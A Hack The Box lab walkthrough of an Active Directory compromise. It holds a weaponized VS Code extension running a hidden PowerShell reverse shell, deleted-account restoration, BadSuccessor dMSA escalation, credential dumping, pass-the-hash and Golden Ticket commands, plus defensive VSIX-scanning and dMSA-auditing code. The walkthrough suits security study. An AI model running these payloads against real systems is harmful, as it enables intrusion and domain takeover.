
Introduction:
The Checkpoint machine on Hack The Box presents a sophisticated Windows Active Directory privilege escalation chain that mirrors real-world enterprise compromise scenarios. This medium-difficulty Windows Server 2025 environment challenges penetration testers to navigate through deleted object restoration, malicious VSIX extension exploitation, and advanced Active Directory attack techniques. What makes Checkpoint particularly valuable is its demonstration of how seemingly minor misconfigurations—such as writable deleted objects and backup access permissions—can cascade into complete domain compromise.
Learning Objectives:
- Master Active Directory enumeration techniques using BloodHound and bloodyad for identifying writable objects and privilege paths
- Understand CVE-2025-55319 VS Code malicious extension RCE and craft weaponized VSIX packages
- Execute the CVE-2025-53779 BadSuccessor dMSA privilege escalation to inherit the privileges of a targeted account
- Extract credentials from VM memory snapshots using VMkatz
- Develop a comprehensive post-exploitation methodology for Windows Active Directory environments
You Should Know:
1. Initial Reconnaissance and Attack Surface Mapping
The journey begins with thorough enumeration of the target’s attack surface. Checkpoint’s open ports reveal a fully functional Active Directory environment:
# Fast full-range port scan to identify open services
nmap -p- --min-rate 5000 -T4 10.129.23.157 | grep open
# Detailed service and version enumeration on the discovered ports
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.23.157 -oN services.nmap
Critical services include DNS (53), Kerberos (88) and kpasswd (464), LDAP, LDAPS and the Global Catalog (389, 636, 3268, 3269), SMB (139, 445), RPC (135, 593), WinRM (5985) and Active Directory Web Services (9389, the port the RSAT PowerShell cmdlets used later talk to). Together they identify a Windows domain controller, so Active Directory enumeration is the primary focus.
With the provided credentials alex.turner / Checkpoint2024!, validate access:
# Validate credentials against the domain
nxc smb 10.129.23.157 -u alex.turner -p 'Checkpoint2024!'
# Enumerate SMB shares with authenticated access
nxc smb 10.129.23.157 -u alex.turner -p 'Checkpoint2024!' --shares
The share enumeration reveals DevDrop with READ permissions—a VS Code extension storage share—and VMBackups with no current access but identified as an escalation target.
2. Deleted Object Discovery and Restoration
A critical misconfiguration emerges: `alex.turner` can write to objects in the CN=Deleted Objects container, that is, to the tombstones of deleted accounts. Deleted objects are not gone: until the tombstone lifetime expires they can be reanimated with a single LDAP modify, and an attacker who can also write to the restored object can reset its password and log in as it.
# Identify AD objects the current user can write to
bloodyAD --host 10.129.23.157 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' get writable
# List deleted users (tombstones under CN=Deleted Objects)
bloodyAD --host 10.129.23.157 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' get deleted_users
Subcommand names differ between bloodyAD releases; confirm the ones used here against `bloodyAD --help` for the installed version.
The enumeration identifies a deleted user account, `mark.davies`, whose tombstone alex.turner can write to. Reanimating it brings the account back; restoration does not recover the old password, but because the object is writable the attacker can set one of their choosing. The restored account has WRITE permissions on DevDrop:
# Restore (reanimate) the deleted user account
bloodyAD --host 10.129.23.157 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' restore_user mark.davies
# Set a known password on the restored object
bloodyAD --host 10.129.23.157 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' set password mark.davies 'RestoredPassword!'
# Verify DevDrop write access with the restored account
nxc smb 10.129.23.157 -u mark.davies -p 'RestoredPassword!' --shares
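To make the restore step concrete, here is an added example (not from the write-up and not bloodyAD's code) that performs the same tombstone reanimation directly over LDAP with Python and ldap3: search CN=Deleted Objects with the Show Deleted control, then send one modify that drops isDeleted and re-homes the object under its lastKnownParent. The host, domain and account names are the write-up's; the sample tombstone GUID is made up, and the live function requires `pip install ldap3` and a reachable DC.

```python
"""Tombstone reanimation over LDAP (added example, not part of the original write-up).

Restoring a deleted AD object is an LDAP modify sent with the Show Deleted control
(OID 1.2.840.113556.1.4.417): remove isDeleted and give the object a new DN under its
lastKnownParent. The helpers are pure and stdlib-only; restore_deleted_user() does the
network work with ldap3 and only runs when called explicitly.
"""
from typing import Dict, List, Tuple

SHOW_DELETED_OID = "1.2.840.113556.1.4.417"   # LDAP_SERVER_SHOW_DELETED_OID
DEL_MARKER = "\\0ADEL:"                        # AD rewrites the RDN to "CN=name\0ADEL:<guid>"

# Same string values ldap3 uses for its MODIFY_* constants, so no import is needed here.
MODIFY_DELETE = "MODIFY_DELETE"
MODIFY_REPLACE = "MODIFY_REPLACE"


def original_rdn(tombstone_dn: str) -> str:
    """'CN=mark.davies\\0ADEL:<guid>,CN=Deleted Objects,...' -> 'CN=mark.davies'."""
    idx = tombstone_dn.find(DEL_MARKER)
    if idx == -1:
        raise ValueError("not a tombstone DN (no \\0ADEL marker): %r" % tombstone_dn)
    return tombstone_dn[:idx]


def build_restore_changes(tombstone_dn: str, last_known_parent: str) -> Tuple[str, Dict[str, List[tuple]]]:
    """Return (new_dn, changes) for the reanimation modify."""
    new_dn = "%s,%s" % (original_rdn(tombstone_dn), last_known_parent)
    changes = {
        "isDeleted": [(MODIFY_DELETE, [])],                 # clears the tombstone flag
        "distinguishedName": [(MODIFY_REPLACE, [new_dn])],  # moves it back out of Deleted Objects
    }
    return new_dn, changes


def deleted_user_filter(sam_account_name: str) -> str:
    """LDAP filter for one deleted user; only matches when Show Deleted is sent."""
    return "(&(isDeleted=TRUE)(objectClass=user)(sAMAccountName=%s))" % sam_account_name


def restore_deleted_user(host: str, domain_dn: str, user: str, password: str, sam_account_name: str) -> str:
    """Find the tombstone and reanimate it. Needs `pip install ldap3` and a reachable DC."""
    import ldap3  # imported here so the pure helpers above work without the dependency

    server = ldap3.Server(host, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=user, password=password,
                            authentication=ldap3.NTLM, auto_bind=True)
    show_deleted = [(SHOW_DELETED_OID, True, None)]
    conn.search("CN=Deleted Objects,%s" % domain_dn, deleted_user_filter(sam_account_name),
                attributes=["lastKnownParent"], controls=show_deleted)
    if not conn.entries:
        raise LookupError("no tombstone for %s" % sam_account_name)
    tombstone = conn.entries[0]
    new_dn, changes = build_restore_changes(tombstone.entry_dn, str(tombstone.lastKnownParent))
    if not conn.modify(tombstone.entry_dn, changes, controls=show_deleted):
        raise RuntimeError("restore failed: %s" % conn.result)
    return new_dn


if __name__ == "__main__":
    # Dry run on a made-up tombstone DN (the GUID is invented); shows the modify that would be sent.
    sample = r"CN=mark.davies\0ADEL:3f2504e0-4f89-11d3-9a0c-0305e82c3301,CN=Deleted Objects,DC=checkpoint,DC=htb"
    print(build_restore_changes(sample, "CN=Users,DC=checkpoint,DC=htb"))
    # Live run against the write-up's DC:
    # restore_deleted_user("10.129.23.157", "DC=checkpoint,DC=htb",
    #                      "checkpoint\\alex.turner", "Checkpoint2024!", "mark.davies")
```

The modify is sent to the tombstone's current DN, so the Show Deleted control has to accompany the modify as well as the search; without it the DC answers that the object does not exist.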
3. Weaponizing VSIX Extensions (CVE-2025-55319)
With WRITE access to DevDrop, the attacker can drop a malicious VS Code extension where other users will pick it up. The machine tracks this as CVE-2025-55319, a VS Code remote code execution reached through a crafted VSIX package.
The attack leverages VS Code's extension model: the activate() function of the extension's main module runs inside the extension host, a Node.js process with the user's full filesystem, network and shell access, as soon as one of the declared activationEvents fires. Declaring "*" means activation on every start-up, so the payload runs with the installing user's privileges and without any further interaction.
Creating a Malicious VSIX Package:
// extension/package.json - Malicious VS Code Extension
{
  "name": "checkpoint-exploit",
  "displayName": "Checkpoint Exploit",
  "version": "1.0.0",
  "publisher": "checkpoint",
  "engines": {
    "vscode": "^1.74.0"
  },
  "activationEvents": ["*"],
  "main": "./out/extension.js"
}
// extension/out/extension.js - Payload Execution
const vscode = require('vscode');
const { exec } = require('child_process');

function activate(context) {
  // Reverse shell payload. PowerShell's own string literals use single quotes so they
  // survive inside the double-quoted -Command argument; replace 10.10.14.X with the listener.
  const payload =
    "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"" +
    "$client=New-Object System.Net.Sockets.TCPClient('10.10.14.X',4444);" +
    "$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};" +
    "while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){" +
    "$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);" +
    "$sendback=(iex $data 2>&1 | Out-String );" +
    "$sendback2=$sendback+'PS '+(pwd).Path+'> ';" +
    "$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);" +
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\"";
  // Fire and forget: the extension host keeps running while the shell lives in a child process
  exec(payload, (error, stdout, stderr) => {});
}

function deactivate() {}

module.exports = { activate, deactivate };
Packaging and Uploading:
# Install the packaging tool (the npm package is now published as @vscode/vsce; the binary is still vsce)
npm install -g @vscode/vsce
# Package the extension directory into a .vsix
vsce package
# Upload the package to the DevDrop share with the restored account
smbclient //10.129.23.157/DevDrop -U mark.davies
smb: \> put checkpoint-exploit-1.0.0.vsix
smb: \> exit
When ryan.brooks, a more privileged user, picks the package up from DevDrop and installs it, VS Code activates the extension at its next start (the "*" activation event) and the reverse shell connects back, providing the initial foothold.
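Before installing anything pulled from a share such as DevDrop, a practitioner wants to know what the package will do on activation. The following is an added example, not code from the write-up or from VS Code, of a small static triage for .vsix files in Python: it treats the VSIX as the zip it is, reads extension/package.json, resolves the main entry point and flags start-up activation and shell-launching code. The two sample packages it builds inline are constructed here (the manifest they carry is a stub, not a vsce-generated one); the malicious one mirrors the package above.

```python
"""Static triage of a .vsix before anyone installs it (added example, not from the write-up).

A VSIX is a zip archive: the extension's package.json lives at extension/package.json and
its entry point is the file named in "main". The inspector pulls both out and flags the
traits the malicious package relies on: activation on every start-up ("*") and
child_process use that launches a shell.
"""
import io
import json
import re
import zipfile
from typing import Dict, List

SUSPICIOUS_ACTIVATION = {"*", "onStartupFinished"}
# (label, regex) pairs; every match is reported with its line number in the entry point.
SUSPICIOUS_PATTERNS = [
    ("child_process", re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]""")),
    ("shell-launch", re.compile(r"\b(exec|execSync|spawn|spawnSync)\s*\(")),
    ("powershell", re.compile(r"powershell(\.exe)?\b.*?(-enc\b|-EncodedCommand|-W\s+Hidden|-Exec\s+Bypass)", re.I)),
    ("network-socket", re.compile(r"TCPClient|net\.connect|new\s+WebSocket|\bfetch\(")),
]


def inspect_vsix(data: bytes) -> Dict[str, object]:
    """Unpack a VSIX from memory and report what its entry point does on activation."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "extension/package.json" not in names:
            return {"name": None, "main": None, "activation": [], "findings": ["no extension/package.json"]}
        manifest = json.loads(zf.read("extension/package.json"))
        activation = manifest.get("activationEvents", [])
        for event in activation:
            if event in SUSPICIOUS_ACTIVATION:
                findings.append("activates without user action: %s" % event)
        main = manifest.get("main")
        main_path = None
        if main:
            rel = main[2:] if main.startswith("./") else main
            # vsce ships the compiled .js; a "main" without extension resolves to <main>.js
            for candidate in ("extension/" + rel, "extension/" + rel + ".js"):
                if candidate in names:
                    main_path = candidate
                    break
        if main_path is None:
            findings.append("entry point %r not found in archive" % main)
        else:
            source = zf.read(main_path).decode("utf-8", errors="replace")
            for lineno, line in enumerate(source.splitlines(), 1):
                for label, pattern in SUSPICIOUS_PATTERNS:
                    if pattern.search(line):
                        findings.append("%s at %s:%d" % (label, main_path, lineno))
    return {"name": manifest.get("name"), "main": main_path, "activation": activation, "findings": findings}


def build_sample_vsix(package_json: dict, extension_js: str) -> bytes:
    """Constructed fixture: vsce's zip layout with a stub manifest (not a real one)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension.vsixmanifest", "<PackageManifest/>")
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("extension/package.json", json.dumps(package_json))
        zf.writestr("extension/out/extension.js", extension_js)
    return buf.getvalue()


# Constructed sample mirroring the write-up's package: start-up activation plus a hidden shell.
MALICIOUS_PACKAGE = {"name": "checkpoint-exploit", "version": "1.0.0", "publisher": "checkpoint",
                     "engines": {"vscode": "^1.74.0"}, "activationEvents": ["*"], "main": "./out/extension.js"}
MALICIOUS_JS = """const vscode = require('vscode');
const { exec } = require('child_process');
function activate(context) {
  exec("powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\"...\\"");
}
module.exports = { activate, deactivate: () => {} };
"""
# Constructed benign counterpart: activates only on its own command, touches no shell.
BENIGN_PACKAGE = {"name": "hello-world", "version": "0.0.1", "publisher": "demo",
                  "engines": {"vscode": "^1.74.0"}, "activationEvents": ["onCommand:hello.say"],
                  "main": "./out/extension.js"}
BENIGN_JS = """const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(vscode.commands.registerCommand('hello.say',
    () => vscode.window.showInformationMessage('hello')));
}
module.exports = { activate, deactivate: () => {} };
"""

if __name__ == "__main__":
    for pkg, js in ((MALICIOUS_PACKAGE, MALICIOUS_JS), (BENIGN_PACKAGE, BENIGN_JS)):
        report = inspect_vsix(build_sample_vsix(pkg, js))
        print(report["name"], "->", report["findings"] or "no findings")
```

Pass a real file with `inspect_vsix(open("checkpoint-exploit-1.0.0.vsix", "rb").read())`. Pattern matching on the entry point is a first filter only: a packed or obfuscated payload, or one that loads further code at runtime, needs the extension run in a sandbox to be judged.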
4. Establishing Persistence and Shell Stabilization
Upon receiving the reverse shell as ryan.brooks, establish a stable working environment:
# On the target (reverse shell): confirm the identity
whoami
checkpoint\ryan.brooks
# Group memberships and token privileges
whoami /all
# Domain account details
net user ryan.brooks /domain
# Look for the user flag
dir C:\Users\ryan.brooks\Desktop
type C:\Users\ryan.brooks\Desktop\user.txt
For a more stable shell, move to WinRM if a credential for ryan.brooks can be recovered after the foothold ('CapturedPassword' below is a placeholder; the reverse shell itself does not reveal it), or stage a second payload from the reverse shell:
# From the attacker machine: test WinRM access
nxc winrm 10.129.23.157 -u ryan.brooks -p 'CapturedPassword'
# If WinRM is accessible
evil-winrm -i 10.129.23.157 -u ryan.brooks -p 'CapturedPassword'
5. dMSA Privilege Escalation (CVE-2025-53779)
With `ryan.brooks` access, the next phase exploits CVE-2025-53779, the BadSuccessor privilege escalation in delegated Managed Service Accounts (dMSAs), a Windows Server 2025 feature; Microsoft patched it in August 2025. The attack needs only the right to create child objects in some OU (CreateChild for msDS-DelegatedManagedServiceAccount), which ryan.brooks holds here, and lets the attacker inherit the privileges of any account they name, in this case svc_deploy.
Understanding dMSA: a dMSA replaces a legacy service account with one whose password Active Directory manages. During a migration the DC records the legacy account in the dMSA's msDS-ManagedAccountPrecededByLink attribute and tracks progress in msDS-DelegatedMSAState (2 means completed). Once the link is set and the state is 2, the KDC issues tickets for the dMSA whose PAC carries the predecessor's group SIDs, and the KERB-DMSA-KEY-PACKAGE in the reply includes the predecessor's keys. Nothing checks that whoever sets the link has any rights over the predecessor, so a dMSA created in a writable OU can claim to succeed svc_deploy, or a Domain Admin.
# Enumerate existing managed service accounts and any predecessor links already present
Get-ADServiceAccount -Filter * -Properties msDS-DelegatedMSAState,msDS-ManagedAccountPrecededByLink
# Create a dMSA in an OU where ryan.brooks has CreateChild. The OU DN is a placeholder:
# find the writable OU with BloodHound or "bloodyAD get writable" first. deploy_dmsa is an
# arbitrary name for the new object.
New-ADServiceAccount -Name "deploy_dmsa" -DNSHostName "deploy_dmsa.checkpoint.htb" `
    -CreateDelegatedServiceAccount -KerberosEncryptionType AES256 `
    -Path "OU=<writable OU>,DC=checkpoint,DC=htb"
# Declare the dMSA the completed successor of svc_deploy
Set-ADServiceAccount -Identity "deploy_dmsa" `
    -Add @{'msDS-ManagedAccountPrecededByLink' = (Get-ADUser svc_deploy).DistinguishedName}
Set-ADServiceAccount -Identity "deploy_dmsa" -Replace @{'msDS-DelegatedMSAState' = 2}
# Obtain a TGT for the current session, then request a dMSA ticket with a Rubeus build that
# supports /dmsa (added for BadSuccessor in 2025). The PAC carries svc_deploy's SIDs and the
# key package its keys.
.\Rubeus.exe tgtdeleg /nowrap
.\Rubeus.exe asktgs /targetuser:deploy_dmsa$ /service:krbtgt/checkpoint.htb /dmsa /opsec /nowrap /ptt /ticket:<base64 TGT from tgtdeleg>
The ticket is issued in the dMSA's name but carries svc_deploy's group memberships, so the session now acts as svc_deploy, a service account with elevated permissions. The key package also discloses svc_deploy's Kerberos keys, including the RC4 key that doubles as its NT hash, so the account can be used directly from the attacker machine as well.
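The flip side of the attack is the audit a defender (or a tester documenting the finding) runs: enumerate every dMSA that claims a predecessor and ask whether that claim is legitimate. What follows is an added example in Python, not from the write-up or from any Microsoft tooling. The directory entries it checks are constructed dicts in the shape ldap3 returns; `query_dmsas()` shows the live LDAP query and needs `pip install ldap3` and a reachable DC; and the severity rules (predecessor on a caller-supplied privileged list, or still enabled after a "completed" migration) are this example's own heuristics.

```python
"""Audit dMSA predecessor links for BadSuccessor abuse (added example, not from the write-up).

BadSuccessor creates a msDS-DelegatedManagedServiceAccount, points its
msDS-ManagedAccountPrecededByLink at a victim and sets msDS-DelegatedMSAState to 2. The
defender's check is therefore: list every dMSA with a predecessor link and grade it.
"""
from typing import Dict, Iterable, List

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
LINK_ATTR = "msDS-ManagedAccountPrecededByLink"
STATE_ATTR = "msDS-DelegatedMSAState"
UAC_ACCOUNTDISABLE = 0x2
STATE_NAMES = {1: "migration in progress", 2: "migration completed"}


def _first(value):
    """ldap3 hands back lists for attributes; normalise to one value (or None)."""
    if isinstance(value, list):
        return value[0] if value else None
    return value


def find_suspicious_dmsas(entries: Iterable[Dict], high_value_dns: Iterable[str]) -> List[Dict]:
    """Grade every dMSA that carries a predecessor link.

    high:   the predecessor is on the caller's list of privileged principals
    medium: the predecessor is still enabled (a change-controlled migration ends with the
            legacy account disabled); unknown predecessors are treated as enabled
    low:    the predecessor has been disabled, as a finished migration would leave it
    """
    entries = list(entries)
    by_dn = {e["distinguishedName"].lower(): e for e in entries}
    high = {dn.lower() for dn in high_value_dns}
    findings = []
    for e in entries:
        if DMSA_CLASS not in e.get("objectClass", []):
            continue
        link = _first(e.get(LINK_ATTR))
        if not link:
            continue  # a dMSA without a predecessor cannot carry anyone else's SIDs
        state = int(_first(e.get(STATE_ATTR)) or 0)
        predecessor = by_dn.get(link.lower())
        pred_uac = int(_first(predecessor.get("userAccountControl")) or 0) if predecessor else 0
        pred_enabled = not (pred_uac & UAC_ACCOUNTDISABLE)
        if link.lower() in high:
            severity = "high"
        elif pred_enabled:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "dmsa": e["distinguishedName"],
            "predecessor": link,
            "state": STATE_NAMES.get(state, "state=%d" % state),
            "predecessor_enabled": pred_enabled,
            "severity": severity,
        })
    return findings


def query_dmsas(host: str, domain_dn: str, user: str, password: str) -> List[Dict]:
    """Pull every dMSA plus each linked predecessor from a DC (ldap3; run on demand)."""
    import ldap3  # local import keeps the offline check dependency-free

    conn = ldap3.Connection(ldap3.Server(host, get_info=ldap3.NONE), user=user, password=password,
                            authentication=ldap3.NTLM, auto_bind=True)
    conn.search(domain_dn, "(objectClass=%s)" % DMSA_CLASS,
                attributes=["objectClass", LINK_ATTR, STATE_ATTR, "whenCreated"])
    results = [dict(e.entry_attributes_as_dict, distinguishedName=e.entry_dn) for e in conn.entries]
    for link in {_first(r.get(LINK_ATTR)) for r in results if r.get(LINK_ATTR)}:
        if conn.search(link, "(objectClass=*)", search_scope=ldap3.BASE, attributes=["userAccountControl"]):
            results.extend(dict(e.entry_attributes_as_dict, distinguishedName=e.entry_dn) for e in conn.entries)
    return results


# Constructed sample data in ldap3's dict shape (not from a real directory).
SAMPLE_ENTRIES = [
    {"distinguishedName": "CN=deploy_dmsa,OU=Staging,DC=checkpoint,DC=htb",
     "objectClass": ["top", DMSA_CLASS],
     LINK_ATTR: ["CN=svc_deploy,CN=Users,DC=checkpoint,DC=htb"], STATE_ATTR: [2]},
    {"distinguishedName": "CN=svc_deploy,CN=Users,DC=checkpoint,DC=htb",
     "objectClass": ["top", "person", "user"], "userAccountControl": [66048]},   # enabled
    {"distinguishedName": "CN=legacy_dmsa,OU=Services,DC=checkpoint,DC=htb",
     "objectClass": ["top", DMSA_CLASS],
     LINK_ATTR: ["CN=svc_legacy,OU=Services,DC=checkpoint,DC=htb"], STATE_ATTR: [2]},
    {"distinguishedName": "CN=svc_legacy,OU=Services,DC=checkpoint,DC=htb",
     "objectClass": ["top", "person", "user"], "userAccountControl": [66050]},   # disabled
    {"distinguishedName": "CN=web_gmsa,CN=Managed Service Accounts,DC=checkpoint,DC=htb",
     "objectClass": ["top", "msDS-GroupManagedServiceAccount"]},                  # no link
]

if __name__ == "__main__":
    for f in find_suspicious_dmsas(SAMPLE_ENTRIES, ["CN=svc_deploy,CN=Users,DC=checkpoint,DC=htb"]):
        print("%-6s %s -> %s (%s)" % (f["severity"], f["dmsa"], f["predecessor"], f["state"]))
```

Run it against a live domain with `find_suspicious_dmsas(query_dmsas(host, "DC=checkpoint,DC=htb", r"checkpoint\user", password), admin_dns)`. On an unpatched Server 2025 DC a "high" hit is an active escalation path; after the CVE-2025-53779 fix it is still a misconfiguration worth removing, since the link records who could have been impersonated.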
6. Backup Access Abuse and Credential Extraction
The `svc_deploy` account is a member of the BackupAccess group, which grants access to the VMBackups share. Virtual machine memory snapshots often contain cached credentials, because whatever LSASS held when the snapshot was taken is frozen in the guest's RAM image. Authenticate with the svc_deploy key material the dMSA ticket request returned (smbclient accepts an NT hash with --pw-nt-hash), or copy the files from the ryan.brooks session after injecting the ticket:
# Access the VMBackups share as svc_deploy using its NT hash
smbclient //10.129.23.157/VMBackups -U 'checkpoint\svc_deploy%<svc_deploy NT hash>' --pw-nt-hash
smb: \> ls
  VM-Snapshot-2025-05-01.vmss
  VM-Snapshot-2025-05-01.vmsn
# Download the snapshot. Fetch the .vmss as well, and any .vmem next to them: VMware may
# keep the guest RAM in a separate .vmem that the analysis tools expect alongside.
smb: \> get VM-Snapshot-2025-05-01.vmsn
smb: \> exit
Extracting Credentials with VMkatz:
VMkatz extracts credentials from VM memory snapshots:
# Extract credentials from the VM memory snapshot
python3 vmkatz.py -f VM-Snapshot-2025-05-01.vmsn
# Alternatively, use Volatility's mimikatz plugin for memory analysis
volatility -f VM-Snapshot-2025-05-01.vmsn --profile=Win10x64_20348 mimikatz
The extraction reveals the Administrator NTLM hash, enabling full domain compromise:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Read the NT value here as a placeholder: 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of an empty password (and aad3b435b51404eeaad3b435b51404ee the blank LM hash), so the real value recovered from the snapshot will differ. A dump that really shows this NT hash means the account has no password, not that the extraction succeeded.
Pass-the-Hash Attack:
# Use the extracted hash for pass-the-hash
nxc smb 10.129.23.157 -u Administrator -H <Administrator NT hash>
# Interactive access with evil-winrm using the hash
evil-winrm -i 10.129.23.157 -u Administrator -H <Administrator NT hash>
7. Post-Exploitation and Persistence
Once Administrator access is achieved, establish persistence and extract final flags:
# Extract the root flag
type C:\Users\Administrator\Desktop\root.txt
# Dump all domain hashes (DRSUAPI replication as Administrator)
nxc smb 10.129.23.157 -u Administrator -H <hash> --ntds
# Create a Golden Ticket for persistence (krbtgt hash and domain SID come from the dump above)
mimikatz # kerberos::golden /user:Administrator /domain:checkpoint.htb /sid:S-1-5-21-xxx /krbtgt:<krbtgt_hash> /id:500 /ptt
What Undercode Say:
- Methodology Over Memorization: The Checkpoint machine reinforces that successful penetration testing relies on systematic enumeration rather than memorized exploit chains. The hardest part isn't exploitation; it is knowing where to look.
- The Cascading Effect of Misconfigurations: A single writable deleted object cascaded into full domain compromise. Seemingly minor Active Directory misconfigurations can create entire attack paths.
- Real-World Relevance: The attack chain mirrors modern enterprise threats. VSIX extension abuse, dMSA manipulation and credential recovery from VM memory all have real-world counterparts in public research and incident reporting.
- Windows-Specific Skill Development: Checkpoint provides invaluable hands-on experience with Windows AD environments, complementing the predominantly Linux-focused HTB machines.
- Patience and Persistence: The multi-stage attack requires methodical progression through each phase; rushing leads to missed opportunities.
Analysis: The Checkpoint machine stands as an exceptional learning tool for offensive security practitioners. Its Windows Server 2025 environment with Active Directory provides a realistic enterprise simulation. The exploitation chain—from deleted object restoration to VSIX RCE, dMSA escalation, and VM memory extraction—mirrors sophisticated APT techniques. The inclusion of recent CVEs (2025-55319 and 2025-53779) ensures relevance to current threat landscapes. For red teamers and penetration testers, mastering this machine develops critical skills in AD enumeration, lateral movement, and privilege escalation that translate directly to real-world engagements. The emphasis on credential extraction from backup artifacts highlights the often-overlooked risk of inadequate backup security.
Prediction:
+1 The techniques demonstrated in Checkpoint will become increasingly relevant as organizations continue migrating to hybrid AD environments, creating more attack surfaces.
+1 The VSIX extension attack vector will see increased attention from both security researchers and threat actors, prompting Microsoft to implement stricter extension signing requirements.
-1 Organizations that fail to audit deleted object permissions and dMSA configurations remain vulnerable to the cascading privilege escalation chain demonstrated in this machine.
-1 The reliance on VM memory snapshots for credential extraction highlights a critical gap in many organizations’ backup security strategies.
+1 Active Directory security training will increasingly incorporate realistic attack chains like Checkpoint, moving beyond theoretical knowledge to practical exploitation skills.
Reported By: Vyankatesh Shinde – Hackers Feeds